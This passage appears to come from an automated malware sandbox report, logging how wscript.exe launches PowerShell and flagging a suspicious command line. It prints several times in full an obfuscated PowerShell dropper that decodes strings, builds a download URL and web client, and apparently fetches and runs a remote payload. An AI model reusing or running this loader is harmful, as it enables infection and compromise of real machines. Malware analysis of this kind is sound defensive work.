aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,niJump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,niJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AF45479 push ebp; iretd 9_2_00007FFB4AF45538
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500EC78 pushfd ; retf 13_2_0500EC79
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07E7CB18 pushfd ; retf 13_2_07E7CD26
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
